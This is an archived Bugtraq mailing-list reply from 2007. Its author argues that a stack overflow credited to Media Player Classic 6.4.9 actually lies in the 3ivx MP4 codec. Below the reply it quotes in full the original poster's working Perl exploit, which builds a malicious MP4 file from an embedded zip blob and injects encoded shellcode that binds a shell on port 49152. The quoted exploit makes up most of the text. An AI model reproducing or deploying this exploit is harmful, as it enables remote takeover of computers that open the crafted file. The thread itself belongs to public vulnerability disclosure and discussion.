| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 12 Dec 2007 09:56:46 -0800 From: "Matthew Leeds" <mleeds@...leeds.net> To: bugtraq@...urityfocus.com Subject: Re: Media Player Classic 6.4.9 MP4 Stack Overflow 0-day Just to rehash this for my own clarity, and perhaps that of others, this is not a defect in Media Player Classic so much as a defect in the 3ivx codec. If one were to use a different codec to decode MP4 content this defect would not exist. This is similar to a defect in Adobe Acrobat Reader browser plugin being mislabeled as a defect in, oh say, Firefox with respect to .pdf files. While I may use Media Player Classic to view MP4 content, I don't have the 3ivx codec installed (I use a different codec) and therefore am not at risk from this defect. I've seen little coverage of this in the press, and of that little I've seen confusion on where the defect exists. Since as far as I know, Media Player Classic does not ship with the 3ivx codec there is no out of the box risk. ---------- ---Matthew *********** REPLY SEPARATOR *********** On 12/8/2007 at 1:54 AM gforce@...ramail.com wrote: >#!/bin/perl ># ># Media Player Classic 6.4.9 MP4 Stack Overflow ># ># 0-day discovered and exploited by SYS 49152 ># ># Tested on win XP SP2 ENG ># Shell on port 49152 ># ># usage: ># - download this codec in order to manage MP4 content: ># http://www.3ivx.com/coral/3ivx_d4_451_win.exe ># ># - open the MP4 file with mplayerc.exe ># ># SYS 49152 ># gforce(put the @ here)operamail(put the . here)com ># ># update: ># the latest 5.0.1 codec is still vulnerable > >use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); > >$zip_data = # code 724981 >"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3". >"\x13\xD9\x53\x73\x02\x00\x00\x57\x04\x00\x00\x19\x00\x00\x00". >"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". >"\x6F\x72\x5F\x4D\x50\x43\x2E\x6D\x70\x34\x63\x60\x60\xBF\x9C". >"\x9B\x9F\x5F\xC6\xC0\xC0\x90\x93\x5B\x96\x91\x02\xA4\x19\x0E". >"\xBC\xF1\x2B\x3B\xF0\x26\x2C\x99\x81\x81\xF9\x05\x88\xCF\xC0". >"\x08\x46\x08\x80\xC2\xC1\xE4\x3B\x30\xE0\x05\x40\xD5\xEC\xF1". >"\xA5\x29\x25\x89\x40\x3A\x3C\x37\x15\x44\x83\x81\x62\x46\x4A". >"\x4E\x11\x4C\x51\x6E\x4A\x66\x51\x62\x41\x41\x0E\x92\x3E\x76". >"\xAD\xCC\x9C\xE2\x12\x20\x43\x62\x65\x5E\x62\x2E\x90\x16\x48". >"\x49\x04\x6B\x86\x59\x2F\xB1\xB2\xBC\xA8\x04\xAB\xB8\x63\x50". >"\x08\x56\xF1\xC4\x9C\x24\x4C\x71\x36\xF3\x95\xC9\xB9\x40\x73". >"\x98\x6F\x21\x8B\x4F\x40\x02\xAC\x4C\x8C\xBE\xBA\x8C\x8C\xBE". >"\x0E\xBE\x0D\x37\x80\x04\x90\x62\x85\x50\x8C\x10\xCA\x01\x42". >"\x75\x41\xA8\x06\x08\x55\x0A\xA1\x58\x20\x14\x37\x84\xFA\xE4". >"\xFB\x9A\x0C\xD0\x9D\x16\xEE\xE0\xCC\xF1\xB3\xA4\xE3\xF5\x84". >"\x41\x03\x5E\xBF\x16\xCD\x99\xE0\x3A\xD1\x97\x95\x05\x12\x36". >"\x01\xBE\x87\x83\x23\x83\x4D\x2C\x0D\x4D\x8D\x14\x82\x42\x7D". >"\x5C\xA3\x14\x8D\x4F\x36\xBF\xDC\x70\xF3\xDD\xCD\x12\x95\x2F". >"\xD1\x8D\xC5\xC2\x2B\x5C\xBF\xEE\x68\x7E\xFD\xE7\xD1\x97\x10". >"\x7D\xB9\xAF\x0E\x7B\xB8\xDC\xC3\x55\xEB\xAE\xF4\x24\xD6\xFD". >"\x9D\x72\xAE\x73\xEF\x05\x17\x29\xE3\xE7\xB1\x75\xCF\x3B\x5C". >"\xE4\x3E\x2A\x17\xD6\xED\x74\x2B\x31\x55\x64\x39\x68\x7A\x66". >"\x7D\x8B\xFD\xD6\x95\xED\x72\x3E\x93\x05\x2F\x4E\xB8\xBB\xA0". >"\xEE\x79\x8F\x8B\xDC\x3D\x65\xCF\x7D\xC6\xDF\x23\xBF\x04\xAF". >"\xCE\xAC\x33\x3C\x92\xF8\xF2\x66\x76\x89\xDE\x1D\x65\xB6\xA3". >"\xC6\x2F\x3C\xEB\x4E\x6C\x79\x51\xF7\x63\x81\xF4\x5C\xB3\x67". >"\xDE\x92\x2F\xC2\x27\x4F\x7E\x7D\x4E\xF7\x58\xD7\x01\xA3\xB6". >"\xAE\xEF\x82\x5C\x19\x07\xFA\x24\x5C\x26\x8B\x72\xE5\x7D\x3F". >"\x23\x70\x4F\x73\xC5\xDF\x5D\x7F\xF5\xBF\xBB\x57\xE8\xEA\x6C". >"\x8C\x7D\xB1\xC8\xBD\x4E\x6C\xD9\xEB\xDF\x62\xDB\x5E\xBF\x16". >"\xE3\xCA\x38\xA7\x6B\xBA\xE3\x9C\x58\x4D\xA4\xAD\x6E\xE0\xA2". >"\x1B\x4D\x40\x39\xFD\xA7\x2F\xFF\xEE\x52\xBD\xC0\xF3\xE2\x76". >"\xE0\xFF\x5D\xCA\xAF\x41\x6C\x5F\x9E\xE2\x8F\x40\xF6\x8B\x3F". >"\x82\x0B\xDC\x2B\xAE\xCD\x8D\xBF\xD8\xDC\xF3\x3E\x7C\x32\x90". >"\xAD\x3C\xFF\xCE\x39\xDD\x69\x57\x15\x17\xCC\x7F\xF1\x31\xC7". >"\xD2\xD0\x5F\x7F\xA3\xA1\x57\x89\xA9\x37\xD3\xEE\xED\x53\xC3". >"\xD8\x6F\x6A\xAB\xDA\x9F\x15\x66\x7E\x37\xF7\x54\xD8\xB7\xC7". >"\xEE\x77\x19\xB9\xF2\x3E\x0B\x2D\x7F\xF9\x53\x64\xFE\xCE\x9F". >"\x22\x0B\x5E\x86\x4F\x9D\x2B\x5A\xE8\x60\xFD\x3A\x7C\xF2\x7C". >"\xF7\xF0\x22\xAE\x0C\x65\x21\x4E\xEB\x1C\x45\xAE\xBC\x5F\x40". >"\xFB\xDC\xBB\x45\x6F\xFC\xDE\xA5\xEC\x5E\x01\x0C\xC4\x52\x70". >"\x52\x4E\x4F\xCD\xC3\x92\xC4\x15\x4A\x8A\xB2\x41\xE2\x12\x50". >"\x71\x74\xA0\x90\x92\x59\x9C\x8D\x47\x5E\xAA\x24\xB7\x20\x1F". >"\x48\x0B\x41\xE5\x45\xE1\x32\x92\xC9\x05\x99\xA0\xDC\x29\x88". >"\x2E\xC3\x91\x0B\x14\x01\x00\x50\x4B\x01\x02\x14\x00\x14\x00". >"\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3\x13\xD9\x53\x73\x02\x00". >"\x00\x57\x04\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00". >"\x20\x00\x00\x00\x00\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31". >"\x35\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x4D\x50\x43\x2E". >"\x6D\x70\x34\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00". >"\x47\x00\x00\x00\xAA\x02\x00\x00\x00\x00"; > >my $shellcode = # code 724981 >"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13". >"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC". >"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0". >"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9". >"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E". >"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49". >"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B". >"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8". >"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6". >"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15". >"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78". >"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB". >"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51". >"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8". >"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF". >"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF". >"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F". >"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB". >"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56". >"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9". >"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F". >"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA". >"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8"; > >open(code, ">tempzip.zip") || die "Can't Write temporary File\n"; >binmode (code); >print code $zip_data; >close (code); >print "\nTemporary file ready, patching..\n"; >my $zip = Archive::Zip->new(); >$zip->read( 'tempzip.zip' ) ; >$zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); >open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary >File\n"; >binmode (code); >seek code,619,0; >print code $shellcode; >close (code); >print "Shellcode added, have fun!\n";
Powered by blists - more mailing lists